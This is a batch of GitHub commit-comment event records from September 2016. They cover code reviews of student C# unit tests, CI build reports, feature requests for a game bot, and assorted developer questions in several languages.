{"id":"4628612243","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202453,"position":43,"line":43,"path":"Дополнительное задание 1/Test/TestTriangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:41:33Z","updated_at":"2016-09-28T05:41:33Z","body":"Тут вы проверили, что нет эксепшена при создании\r\nПри этом не вижу проверки, что объект действительно создан, в testTriangle может оказаться null и тест пройдет"}},"created_at":"2016-09-28T05:41:33Z"}
{"id":"4628612371","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202456,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:41:36Z","updated_at":"2016-09-28T05:41:36Z","body":"and auto purchase key in own dragon\r\nnaah nevermind if it's too hard ahaha\r\n"}},"created_at":"2016-09-28T05:41:36Z"}
{"id":"4628617562","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202469,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:43:34Z","updated_at":"2016-09-28T05:43:34Z","body":"it will include with attack own dragon"}},"created_at":"2016-09-28T05:43:34Z"}
{"id":"4628618542","type":"CommitCommentEvent","actor":{"login":"atscream02"},"repo":{"name":"huenato/iBlueIt"},"payload":{"comment":{"id":19202470,"position":null,"line":null,"path":null,"commit_id":"afa893971ac565cfd50e4d2c418cdc7f71d3c7ed","created_at":"2016-09-28T05:43:57Z","updated_at":"2016-09-28T05:43:57Z","body":"Mr. Huenato can you upload again the war mode add on in tree of savior i can find your warmode 404 error T_T"}},"created_at":"2016-09-28T05:43:57Z"}
{"id":"4628619892","type":"CommitCommentEvent","actor":{"login":"maddyscientist"},"repo":{"name":"lattice/quda"},"payload":{"comment":{"id":19202475,"position":null,"line":null,"path":null,"commit_id":"5cdc913fef40882c99d9c48c954827887eccb17c","created_at":"2016-09-28T05:44:29Z","updated_at":"2016-09-28T05:44:29Z","body":"Glad to see progress!  You'll need to add a new `QudaInverterType` in enum_quda.h and matching type in enum_quda_fortran.h.  For defining the ell dimension perhaps the `QudaInvertParam::GCRnkrylov` parameter could be used.  Also, add the solver instantiation to the solver factory in solver.cpp."}},"created_at":"2016-09-28T05:44:29Z"}
{"id":"4628620352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202476,"position":null,"line":null,"path":null,"commit_id":"ed69961c29d7947d198b799319b39068a6d30502","created_at":"2016-09-28T05:44:41Z","updated_at":"2016-09-28T05:44:41Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed69961c29d7947d198b799319b39068a6d30502-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-28T05:44:41Z"}
{"id":"4628639982","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202508,"position":118,"line":94,"path":"Task1/Triangle.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T05:52:15Z","updated_at":"2016-09-28T05:52:15Z","body":"ОООООООООООООООЧЧЧЧЧЧЧЧЕЕЕЕЕЕНННННЬЬЬЬЬЬЬ длинное название метода"}},"created_at":"2016-09-28T05:52:15Z"}
{"id":"4628642779","type":"CommitCommentEvent","actor":{"login":"mplecapt"},"repo":{"name":"MtuMartian/HGD-Team6-2016"},"payload":{"comment":{"id":19202513,"position":null,"line":null,"path":null,"commit_id":"2ca1ccc90c620badbbb573966cea147216bf9d86","created_at":"2016-09-28T05:53:22Z","updated_at":"2016-09-28T05:53:22Z","body":"The change to the .gitignore appears to have worked, since it didn't create any conflicts this time around."}},"created_at":"2016-09-28T05:53:22Z"}
{"id":"4628643603","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202516,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:53:39Z","updated_at":"2016-09-28T05:53:39Z","body":"great thank you!"}},"created_at":"2016-09-28T05:53:39Z"}
{"id":"4628643645","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202517,"position":73,"line":49,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T05:53:40Z","updated_at":"2016-09-28T05:53:40Z","body":"Assert.IsTrue используйте когда проверяете результат булевого метода\r\nТут вы сравниваете два значения, используйте для этого Assert.AreEquals()"}},"created_at":"2016-09-28T05:53:40Z"}
{"id":"4628645272","type":"CommitCommentEvent","actor":{"login":"JasonaEV"},"repo":{"name":"SproutBoard/ServerRackMonitoring"},"payload":{"comment":{"id":19202520,"position":null,"line":null,"path":null,"commit_id":"859dd983cf5740dfecff77ea76ba0f940a1e4153","created_at":"2016-09-28T05:54:21Z","updated_at":"2016-09-28T05:54:21Z","body":"Hi Jonathan,\r\n\r\nI'm trying to compile this and was wondering what version you used? I get errors on 1.6.5, 1.5.0, 1.0.1, etc..\r\n\r\nI really want to build this but can't flash my board. Thanks!"}},"created_at":"2016-09-28T05:54:21Z"}
{"id":"4628646607","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202523,"position":104,"line":79,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T05:54:51Z","updated_at":"2016-09-28T05:54:51Z","body":"Жесть. Надо как-то это упростить потому что читать невозможно\r\nКстати Assert.AreEquals при сравнении даблов умеет толеранс учитывать, вроде"}},"created_at":"2016-09-28T05:54:51Z"}
{"id":"4628647377","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19202524,"position":null,"line":null,"path":null,"commit_id":"b4d4a0728ed5ac5b449c570961fa6a2b1a491476","created_at":"2016-09-28T05:55:09Z","updated_at":"2016-09-28T05:55:09Z","body":"What are they useful for? Any puppy script/app needs them? Any future interesting apps will depend on them?\r\n\r\nOn a related note, trimming distro packages is a (mostly overlooked) key puppy characteristic counting to some extend for its smaller size and performance (but also loooong building times and incompatibilities ...) that differentiates it from other small frugal distros that are also based on mainstream distros.\r\nWe may want to drop this and go mainstream utilising the unmodified distro packages. James' woof-next branch is already doing this and it just needs some TLC to become production quality 😉 "}},"created_at":"2016-09-28T05:55:09Z"}
{"id":"4628648072","type":"CommitCommentEvent","actor":{"login":"Astrubale"},"repo":{"name":"NamelessRom/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19202528,"position":null,"line":null,"path":null,"commit_id":"c09aca1b59777acd8428d288af246c5ed3c2c936","created_at":"2016-09-28T05:55:22Z","updated_at":"2016-09-28T05:55:22Z","body":"Why?"}},"created_at":"2016-09-28T05:55:22Z"}
{"id":"4628648645","type":"CommitCommentEvent","actor":{"login":"linyouxun"},"repo":{"name":"linyouxun/gallary-by-react"},"payload":{"comment":{"id":19202531,"position":97,"line":90,"path":"src/components/Main.js","commit_id":"f55ec86dbd5495c043409e3a8d4f9ef3f11202db","created_at":"2016-09-28T05:55:33Z","updated_at":"2016-09-28T05:55:33Z","body":"//nihao"}},"created_at":"2016-09-28T05:55:33Z"}
{"id":"4628649080","type":"CommitCommentEvent","actor":{"login":"jsstar522"},"repo":{"name":"maxpumperla/betago"},"payload":{"comment":{"id":19202532,"position":null,"line":null,"path":null,"commit_id":"be14775b9e19bfdde41caacb2620935a4637cdf8","created_at":"2016-09-28T05:55:42Z","updated_at":"2016-09-28T05:55:42Z","body":"I installed and followed all process, but I got errors again.\r\n\r\n\r\nTraceback (most recent call last):\r\n  File \"run_demo.py\", line 6, in <module>\r\n    from keras.models import model_from_yaml\r\n  File \"/Users/jongseok/.betago/lib/python2.7/site-packages/keras/__init__.py\", line 2, in <module>\r\n    from . import backend\r\n  File \"/Users/jongseok/.betago/lib/python2.7/site-packages/keras/backend/__init__.py\", line 69, in <module>\r\n    from .tensorflow_backend import *\r\n  File \"/Users/jongseok/.betago/lib/python2.7/site-packages/keras/backend/tensorflow_backend.py\", line 6, in <module>\r\n    import tensorflow.contrib.ctc as ctc\r\nImportError: No module named contrib.ctc "}},"created_at":"2016-09-28T05:55:42Z"}
{"id":"4628649093","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202533,"position":110,"line":85,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T05:55:42Z","updated_at":"2016-09-28T05:55:42Z","body":"ShouldThrowArgumentExceptionWhenCreateWithSideOrAngleLessOrEqualZero"}},"created_at":"2016-09-28T05:55:42Z"}
{"id":"4628650204","type":"CommitCommentEvent","actor":{"login":"omiroshnichenko"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19202539,"position":null,"line":null,"path":null,"commit_id":"488bfdfff7c51824d9a4a2c1061019b3b35b2d72","created_at":"2016-09-28T05:56:08Z","updated_at":"2016-09-28T05:56:08Z","body":"@otg-chris I can help you.\r\nhttps://github.com/magento/magento2ce/blob/2.1/app/code/Magento/Sales/Model/AdminOrder/Create.php#L1316 at this line you must change CustomerForm::DONT_IGNORE_INVISIBLE to CustomerForm::IGNORE_INVISIBLE.\r\nhttps://github.com/magento/magento2ce/blob/2.1/app/code/Magento/Sales/Model/AdminOrder/Create.php#L1562\r\nhttps://github.com/magento/magento2ce/blob/2.1/app/code/Magento/Sales/Model/AdminOrder/Create.php#L1568 remove these lines.\r\nBefore this line https://github.com/magento/magento2ce/blob/2.1/app/code/Magento/Sales/Model/AdminOrder/Create.php#L1578 add this code `$customerData = $this->customerMapper->toFlatArray($customer);`."}},"created_at":"2016-09-28T05:56:08Z"}
{"id":"4628651001","type":"CommitCommentEvent","actor":{"login":"Evisceration"},"repo":{"name":"NamelessRom/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19202543,"position":null,"line":null,"path":null,"commit_id":"c09aca1b59777acd8428d288af246c5ed3c2c936","created_at":"2016-09-28T05:56:26Z","updated_at":"2016-09-28T05:56:26Z","body":"we ship our own generic implementation of doze controls"}},"created_at":"2016-09-28T05:56:26Z"}
{"id":"4628655454","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19202549,"position":null,"line":null,"path":null,"commit_id":"4324d8f4b0bc47413a655d74bffcc1ef378f2995","created_at":"2016-09-28T05:58:02Z","updated_at":"2016-09-28T05:58:02Z","body":"Nice!"}},"created_at":"2016-09-28T05:58:02Z"}
{"id":"4628656666","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202550,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:58:31Z","updated_at":"2016-09-28T05:58:31Z","body":"Auto fusion when hero max will be a great idea LOL\n\n\n\nOn 28 Sep 2016 1:53 p.m., \"naufalizee\" <notifications@github.com> wrote:\n\n> great thank you!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dreammed/SevenKnightsAI/commit/f513adb0dc7f86f2e5265a7cdc174af51191d330#commitcomment-19202516>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASkvt9cTr4uxgr4WkGE2vkqixAH1GwFcks5qugDkgaJpZM4KGqvQ>\n> .\n>\n"}},"created_at":"2016-09-28T05:58:31Z"}
{"id":"4628657546","type":"CommitCommentEvent","actor":{"login":"kilbee"},"repo":{"name":"frmdstryr/garden.mapview"},"payload":{"comment":{"id":19202551,"position":null,"line":null,"path":null,"commit_id":"8e101d5cf21206b2e192beab5a382f7615ca42ad","created_at":"2016-09-28T05:58:51Z","updated_at":"2016-09-28T05:58:51Z","body":"Does it work with old or new toolchain (both)? And do you precompile modules or use pyximport? Care to elaborate on how to build an apk out of this fork/submit working minimal example? I'd like to give it a go."}},"created_at":"2016-09-28T05:58:51Z"}
{"id":"4628667050","type":"CommitCommentEvent","actor":{"login":"shishirui"},"repo":{"name":"shishirui/git-test"},"payload":{"comment":{"id":19202600,"position":14,"line":23,"path":"LICENSE","commit_id":"c8fae195ef813701e158aa932f38058b7eda79e2","created_at":"2016-09-28T06:02:10Z","updated_at":"2016-09-28T06:02:10Z","body":"add test"}},"created_at":"2016-09-28T06:02:10Z"}
{"id":"4628667733","type":"CommitCommentEvent","actor":{"login":"loclam812"},"repo":{"name":"loclam812/Seminar-Chuy-n-"},"payload":{"comment":{"id":19202601,"position":null,"line":null,"path":null,"commit_id":"ae587ae205c70c6b9dd6e071f80f3bebf05189ee","created_at":"2016-09-28T06:02:25Z","updated_at":"2016-09-28T06:02:25Z","body":"LTL"}},"created_at":"2016-09-28T06:02:25Z"}
{"id":"4628675007","type":"CommitCommentEvent","actor":{"login":"sergkondr"},"repo":{"name":"sergkondr/spritz_reader"},"payload":{"comment":{"id":19202616,"position":null,"line":null,"path":null,"commit_id":"23b5e5de4b9310198f8f29189aa21dd374f93ab7","created_at":"2016-09-28T06:04:51Z","updated_at":"2016-09-28T06:04:51Z","body":"Somebody can call this changes - \"Redesign\", but i can't"}},"created_at":"2016-09-28T06:04:51Z"}
{"id":"4628678649","type":"CommitCommentEvent","actor":{"login":"mizdebsk"},"repo":{"name":"fedora-java/xmvn"},"payload":{"comment":{"id":19202622,"position":6,"line":167,"path":"xmvn-it/pom.xml","commit_id":"374823375c730a36540baa329104f4fe2794b772","created_at":"2016-09-28T06:06:08Z","updated_at":"2016-09-28T06:06:08Z","body":"I thought it was packaged... I will replace it with a different extension."}},"created_at":"2016-09-28T06:06:08Z"}
{"id":"4628686321","type":"CommitCommentEvent","actor":{"login":"mizdebsk"},"repo":{"name":"fedora-java/xmvn"},"payload":{"comment":{"id":19202634,"position":6,"line":167,"path":"xmvn-it/pom.xml","commit_id":"374823375c730a36540baa329104f4fe2794b772","created_at":"2016-09-28T06:08:53Z","updated_at":"2016-09-28T06:08:53Z","body":"Actually it is packaged :) takari-local-repository, mvn(io.takari.aether:takari-local-repository)\r\nBut I replaced it anyway."}},"created_at":"2016-09-28T06:08:53Z"}
{"id":"4628696110","type":"CommitCommentEvent","actor":{"login":"leeight"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19202652,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-28T06:12:24Z","updated_at":"2016-09-28T06:12:24Z","body":"@swankjesse Can i add an options to disable this logic, if possible, i'll send an PR?"}},"created_at":"2016-09-28T06:12:24Z"}
{"id":"4628696892","type":"CommitCommentEvent","actor":{"login":"pabitrapadhy"},"repo":{"name":"cocos2d/cocos2d-x"},"payload":{"comment":{"id":19202656,"position":null,"line":null,"path":null,"commit_id":"400e77808c2105e3406f082c720e0acecf47cd72","created_at":"2016-09-28T06:12:41Z","updated_at":"2016-09-28T06:12:41Z","body":"I am facing editbox issue for which the commit was made.\r\nIf I keep the app on background and bring to foreground, it's for some reason detach it's IME.\r\n\r\nI am using cocos3.9\r\nhas it been fixed in some other cocos versions ? because I don't see any major changes in this file which would solve the issue.. !!"}},"created_at":"2016-09-28T06:12:41Z"}
{"id":"4628699554","type":"CommitCommentEvent","actor":{"login":"mregen"},"repo":{"name":"OPCFoundation/UA-.NETStandardLibrary"},"payload":{"comment":{"id":19202660,"position":5,"line":88,"path":"SampleApplications/Samples/GDS/GlobalDiscoveryServer.csproj","commit_id":"624e7192ded2c9abd198fd84cc15a9c84391645a","created_at":"2016-09-28T06:13:36Z","updated_at":"2016-09-28T06:13:36Z","body":"Why net45?"}},"created_at":"2016-09-28T06:13:36Z"}
{"id":"4628699570","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"srhb/nixpkgs"},"payload":{"comment":{"id":19202661,"position":null,"line":null,"path":null,"commit_id":"3d4fae6f0f0c67c547d37f24bab0345c07683f50","created_at":"2016-09-28T06:13:36Z","updated_at":"2016-09-28T06:13:36Z","body":"Thanks!"}},"created_at":"2016-09-28T06:13:36Z"}
{"id":"4628700369","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19202662,"position":null,"line":null,"path":null,"commit_id":"6ba96a10e97aee695d2a4b272a14c8a84cb71476","created_at":"2016-09-28T06:13:54Z","updated_at":"2016-09-28T06:13:54Z","body":"@Beep6581 Well, it's not actually *my* \"×\", but the one that was used in most but not all places. :wink: "}},"created_at":"2016-09-28T06:13:54Z"}
{"id":"4628703293","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202680,"position":null,"line":null,"path":null,"commit_id":"6624183a2cf32a08b19987ced3a88e57419d4489","created_at":"2016-09-28T06:14:57Z","updated_at":"2016-09-28T06:14:57Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2314 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.67%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T06:14:57Z"}
{"id":"4628704965","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19202684,"position":null,"line":null,"path":null,"commit_id":"9009eaf968f630bc23070aaec9ea73ee38934961","created_at":"2016-09-28T06:15:30Z","updated_at":"2016-09-28T06:15:30Z","body":"Please add an entry to the changelog, thanks!"}},"created_at":"2016-09-28T06:15:30Z"}
{"id":"4628705741","type":"CommitCommentEvent","actor":{"login":"kasaimiluo"},"repo":{"name":"kasaimiluo/week3"},"payload":{"comment":{"id":19202687,"position":null,"line":null,"path":null,"commit_id":"aae1fcbd6fb139f9a8e0e7f92a576b7c89513f2a","created_at":"2016-09-28T06:15:46Z","updated_at":"2016-09-28T06:15:46Z","body":"老师，之后的课程我有时间也会去看的，i迟到了一天交给你，真是不好意思啊。"}},"created_at":"2016-09-28T06:15:46Z"}
{"id":"4628711479","type":"CommitCommentEvent","actor":{"login":"alisorri"},"repo":{"name":"christianjoun/app-storage"},"payload":{"comment":{"id":19202696,"position":null,"line":null,"path":null,"commit_id":"22f99ffbda271ab88341dc35bc16fc57b6b87f92","created_at":"2016-09-28T06:17:46Z","updated_at":"2016-09-28T06:17:46Z","body":"when i use this patch it stuck when he reach to Initializing stored value.\r\n"}},"created_at":"2016-09-28T06:17:46Z"}
{"id":"4628712606","type":"CommitCommentEvent","actor":{"login":"SlZeroth"},"repo":{"name":"JSpiner/gtx1080_tensorflow"},"payload":{"comment":{"id":19202700,"position":null,"line":null,"path":null,"commit_id":"e846ab1983f9e69726b6e499e2e051dbec45b386","created_at":"2016-09-28T06:18:10Z","updated_at":"2016-09-28T06:18:10Z","body":"이거 뭐죠"}},"created_at":"2016-09-28T06:18:10Z"}
{"id":"4628716459","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202717,"position":118,"line":94,"path":"Task1/Triangle.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T06:19:32Z","updated_at":"2016-09-28T06:19:32Z","body":"Ага, я знаю. А что делать?))) Ко мне один преподаватель приставал, что не понятно, что и как делает метод. Отсюда названия такие\n\n\n>Среда, 28 сентября 2016, 10:52 +05:00 от Alexander Kozko <notifications@github.com>:\n>\n>ОООООООООООООООЧЧЧЧЧЧЧЧЕЕЕЕЕЕНННННЬЬЬЬЬЬЬ длинное название метода\n>—\n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-28T06:19:32Z"}
{"id":"4628718655","type":"CommitCommentEvent","actor":{"login":"messense"},"repo":{"name":"bosondata/badwolf"},"payload":{"comment":{"id":19202721,"position":null,"line":null,"path":null,"commit_id":"3c521a68538ce5fe9ad5d8a6078340f545176932","created_at":"2016-09-28T06:20:15Z","updated_at":"2016-09-28T06:20:15Z","body":"Fixes #2 "}},"created_at":"2016-09-28T06:20:15Z"}
{"id":"4628723304","type":"CommitCommentEvent","actor":{"login":"Udgin"},"repo":{"name":"Udgin/System.Net.Torrent"},"payload":{"comment":{"id":19202740,"position":10,"line":10,"path":"TorrentClient/BaseScraper.cs","commit_id":"fe930fbedf81ffe745cfdc7190c4f5c5ed7b9fac","created_at":"2016-09-28T06:21:49Z","updated_at":"2016-09-28T06:21:49Z","body":"thanks! this branch has been deleted"}},"created_at":"2016-09-28T06:21:49Z"}
{"id":"4628727122","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202743,"position":73,"line":49,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T06:23:07Z","updated_at":"2016-09-28T06:23:07Z","body":"\nАаа вон вижу.\n\nВы про вот эти строчки?))) Да я что-то привык использовать Assert.IsTrue.. )) Я изменю\nAssert.IsTrue(sidesTriangle[ 0 ] == sidesTriangle[ 1 ] && sidesTriangle[ 1 ] == sidesTriangle[ 2 ]);\nAssert.IsTrue(anglesTriangle[ 0 ] == anglesTriangle[ 1 ] && anglesTriangle[ 1 ] == anglesTriangle[ 2 ]);\n\n>Среда, 28 сентября 2016, 10:53 +05:00 от Alexander Kozko <notifications@github.com>:\n>\n>Assert.IsTrue используйте когда проверяете результат булевого метода\n>Тут вы сравниваете два значения, используйте для этого Assert.AreEquals()\n>—\n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-28T06:23:07Z"}
{"id":"4628736475","type":"CommitCommentEvent","actor":{"login":"LeuisKen"},"repo":{"name":"BubbleSalvatore/Task"},"payload":{"comment":{"id":19202759,"position":100,"line":100,"path":"task2/Task 2(week 1).html","commit_id":"9c4f94e9dad686a49d268fc81450ddd2daeb2821","created_at":"2016-09-28T06:26:20Z","updated_at":"2016-09-28T06:26:20Z","body":"label的for是和id对应的，这里的for没有对应的id"}},"created_at":"2016-09-28T06:26:20Z"}
{"id":"4628737159","type":"CommitCommentEvent","actor":{"login":"LeuisKen"},"repo":{"name":"BubbleSalvatore/Task"},"payload":{"comment":{"id":19202762,"position":103,"line":103,"path":"task2/Task 2(week 1).html","commit_id":"9c4f94e9dad686a49d268fc81450ddd2daeb2821","created_at":"2016-09-28T06:26:35Z","updated_at":"2016-09-28T06:26:35Z","body":"没有对应的id"}},"created_at":"2016-09-28T06:26:35Z"}
{"id":"4628739388","type":"CommitCommentEvent","actor":{"login":"LeuisKen"},"repo":{"name":"BubbleSalvatore/Task"},"payload":{"comment":{"id":19202766,"position":106,"line":106,"path":"task2/Task 2(week 1).html","commit_id":"9c4f94e9dad686a49d268fc81450ddd2daeb2821","created_at":"2016-09-28T06:27:20Z","updated_at":"2016-09-28T06:27:20Z","body":"没有对应的id，其实因为for需要id，我经常会让label包着input"}},"created_at":"2016-09-28T06:27:20Z"}
{"id":"4628740914","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19202770,"position":null,"line":null,"path":null,"commit_id":"dd5a4e42ad210fb23507afceb5094ea4ea90337c","created_at":"2016-09-28T06:27:49Z","updated_at":"2016-09-28T06:27:49Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Narrative](https://trello.com/c/Zk0cbcuO/6-narrative)"}},"created_at":"2016-09-28T06:27:49Z"}
{"id":"4628741579","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202774,"position":104,"line":79,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T06:28:03Z","updated_at":"2016-09-28T06:28:03Z","body":"\nАаа вон)) Ураа.\n\nНашел перегрузку для Assert.AreEqual при сравнении 2 double и точности\nЗаменю)\n\n>Среда, 28 сентября 2016, 10:54 +05:00 от Alexander Kozko <notifications@github.com>:\n>\n>Жесть. Надо как-то это упростить потому что читать невозможно\n>Кстати Assert.AreEquals при сравнении даблов умеет толеранс учитывать, вроде\n>—\n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-28T06:28:03Z"}
{"id":"4628742774","type":"CommitCommentEvent","actor":{"login":"TangZuqin"},"repo":{"name":"TangZuqin/-"},"payload":{"comment":{"id":19202777,"position":null,"line":null,"path":null,"commit_id":"8470d48113d2e77415dfec44061f29d44a2a084b","created_at":"2016-09-28T06:28:27Z","updated_at":"2016-09-28T06:28:27Z","body":"恢复"}},"created_at":"2016-09-28T06:28:27Z"}
{"id":"4628743445","type":"CommitCommentEvent","actor":{"login":"rohitnahata"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202781,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:28:38Z","updated_at":"2016-09-28T06:28:38Z","body":"Mein tera JSON file badme use karunga 👊 "}},"created_at":"2016-09-28T06:28:38Z"}
{"id":"4628743824","type":"CommitCommentEvent","actor":{"login":"burning0406"},"repo":{"name":"0xfeedface1993/PhotoEditor"},"payload":{"comment":{"id":19202783,"position":null,"line":null,"path":null,"commit_id":"639ec3398d5e6b8b47c7077bbdbcb96d94933eb0","created_at":"2016-09-28T06:28:46Z","updated_at":"2016-09-28T06:28:46Z","body":"写的不错"}},"created_at":"2016-09-28T06:28:46Z"}
{"id":"4628744697","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19202786,"position":null,"line":null,"path":null,"commit_id":"73df1cc7f9698010a2be0aadf9f242d4c5172a4a","created_at":"2016-09-28T06:29:04Z","updated_at":"2016-09-28T06:29:04Z","body":"Porqué se necesita el api_get_local_time? Esto solo debería aparecer justo antes que se muestre una fecha.\r\n"}},"created_at":"2016-09-28T06:29:04Z"}
{"id":"4628744876","type":"CommitCommentEvent","actor":{"login":"dPramod"},"repo":{"name":"ericgio/react-bootstrap-typeahead"},"payload":{"comment":{"id":19202788,"position":null,"line":null,"path":null,"commit_id":"e683fe61d268bcbd0bb5b953fddda6c46e4f3e84","created_at":"2016-09-28T06:29:08Z","updated_at":"2016-09-28T06:29:08Z","body":"Hi, Due to this fix, the backspace is not working on IE... And therefore I though of using \"text\" from state to make sure that input text is null before we disable the default."}},"created_at":"2016-09-28T06:29:08Z"}
{"id":"4628745446","type":"CommitCommentEvent","actor":{"login":"Drutol"},"repo":{"name":"Drutol/MALClient"},"payload":{"comment":{"id":19202791,"position":6,"line":42,"path":"MALClient.XShared/ViewModels/Main/AnimeListViewModel.cs","commit_id":"cb322775bd133b2290941011f1f39f58b8974eaa","created_at":"2016-09-28T06:29:19Z","updated_at":"2016-09-28T06:29:19Z","body":"Umm, może deczko inaczej by to nazwać żeby było bardziej uniwersalne? Na androidzie też chyba będzie trzeba tak zrobić."}},"created_at":"2016-09-28T06:29:19Z"}
{"id":"4628746056","type":"CommitCommentEvent","actor":{"login":"Yixiaohan"},"repo":{"name":"nicegdhj/show-me-the-code"},"payload":{"comment":{"id":19202794,"position":40,"line":38,"path":"README.md","commit_id":"98b9d7b0c8b709ef68186c2fa4c86439e39081f2","created_at":"2016-09-28T06:29:30Z","updated_at":"2016-09-28T06:29:30Z","body":"@nicegdhj  请你，设身处地的想一想，如果有几百号人像你这样「试一试」，将会给我造成多大的困扰？"}},"created_at":"2016-09-28T06:29:30Z"}
